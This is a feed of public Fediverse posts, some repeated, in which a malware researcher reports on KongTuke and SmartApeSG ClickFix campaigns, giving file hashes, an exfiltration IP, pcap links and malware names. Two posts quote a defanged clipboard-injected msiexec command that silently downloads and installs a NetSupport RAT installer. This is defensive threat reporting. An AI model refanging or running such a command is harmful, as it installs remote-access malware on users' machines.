home.social
Sign in Create account

#kongtuke — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #kongtuke, aggregated by home.social.

  1. Brad @[email protected] ·

    2026-04-09 (Thursday): I found a site with inject script for both the #KongTuke and #SmartApeSG campaigns. Only got #SmartApeSG

    Zip archive payload: c0d91df99b279ebfd952dadf0d1b94e436defa6bb59752cfad13777187f88553

    Saw the same possible data exfiltration traffic to the same server at 89.110.110[.]119:443 that I saw from the previous payload from SmartApeSG campaign I reported on Monday 2026-04-06.

    #kongtuke #smartapesg
  2. Brad @[email protected] ·

    2026-04-09 (Thursday): I found a site with inject script for both the #KongTuke and #SmartApeSG campaigns. Only got #SmartApeSG

    Zip archive payload: c0d91df99b279ebfd952dadf0d1b94e436defa6bb59752cfad13777187f88553

    Saw the same possible data exfiltration traffic to the same server at 89.110.110[.]119:443 that I saw from the previous payload from SmartApeSG campaign I reported on Monday 2026-04-06.

    #kongtuke #smartapesg
  3. Brad @[email protected] ·

    NOTE: This has been updated to correct the malware names. Thanks, @netresec!

    2026-02-02 (Monday) #KongTuke #ClickFix activity leads to #MintsLoader and #GhostWeaver #RAT

    Today, the ClickFix text uses the "finger" command, which is a tactic used by KongTuke and other ClickFix campaigns in previous weeks/months.

    A #pcap of the infection traffic, some artifacts, and further details are available at malware-traffic-analysis.net/2

    #kongtuke #clickfix #pcap #mintsloader #ghostweaver #rat
  4. Brad @[email protected] ·

    2026-01-08 (Thursday): Got a full infection from #KongTuke campaign #ClickFix activity today.

    I split the traffic from this infection into two #pcap files, and the second one is over 200 MB, because of the malware download.

    Pcap files, the associated malware, artifacts, and further information is available at malware-traffic-analysis.net/2

    #kongtuke #clickfix #pcap
  5. Brad @[email protected] ·

    I finished compiling the information for #Kongtuke #ClickFix activity using the finger command on 2025-12-11, and it's now live at www.malware-traffic-analysis.net/2025/12/11/index2.html

    I'd already posted the #SmartApeSG ClickFix activity using finger that same day, so now both are available.

    I had to run the ClickFix command on a physical host because the C2 server didn't like me when I initially tried it on a VM.

    Post-infection traffic looks like the same type of #AsyncRAT I've seen before, and some Tor traffic from whatever the follow-up malware is.

    It's a 221 MB zip archive containing the #pcap for the full infection, and it's about the same size as the zip archive containing forensic artifacts from the infected host.

    #kongtuke #clickfix #smartapesg #asyncrat #pcap
  6. Brad @[email protected] ·

    I finished compiling the information for #Kongtuke #ClickFix activity using the finger command on 2025-12-11, and it's now live at www.malware-traffic-analysis.net/2025/12/11/index2.html

    I'd already posted the #SmartApeSG ClickFix activity using finger that same day, so now both are available.

    I had to run the ClickFix command on a physical host because the C2 server didn't like me when I initially tried it on a VM.

    Post-infection traffic looks like the same type of #AsyncRAT I've seen before, and some Tor traffic from whatever the follow-up malware is.

    It's a 221 MB zip archive containing the #pcap for the full infection, and it's about the same size as the zip archive containing forensic artifacts from the infected host.

    #kongtuke #clickfix #smartapesg #asyncrat #pcap
  7. Brad @[email protected] ·

    I finished compiling the information for #Kongtuke #ClickFix activity using the finger command on 2025-12-11, and it's now live at www.malware-traffic-analysis.net/2025/12/11/index2.html

    I'd already posted the #SmartApeSG ClickFix activity using finger that same day, so now both are available.

    I had to run the ClickFix command on a physical host because the C2 server didn't like me when I initially tried it on a VM.

    Post-infection traffic looks like the same type of #AsyncRAT I've seen before, and some Tor traffic from whatever the follow-up malware is.

    It's a 221 MB zip archive containing the #pcap for the full infection, and it's about the same size as the zip archive containing forensic artifacts from the infected host.

    #kongtuke #clickfix #smartapesg #asyncrat #pcap
  8. Brad @[email protected] ·

    2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

    While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

    #clipboardhijacking Script injected into clipboard:

    msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

    The downloaded file is an MSI for #NetSupportRAT

    virustotal.com/gui/file/958586

    #smartapesg #filefix #clickfix #kongtuke #netsupportrat #clipboardhijacking
  9. Brad @[email protected] ·

    2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

    While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

    #clipboardhijacking Script injected into clipboard:

    msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

    The downloaded file is an MSI for #NetSupportRAT

    virustotal.com/gui/file/958586

    #clipboardhijacking #smartapesg #filefix #clickfix #kongtuke #netsupportrat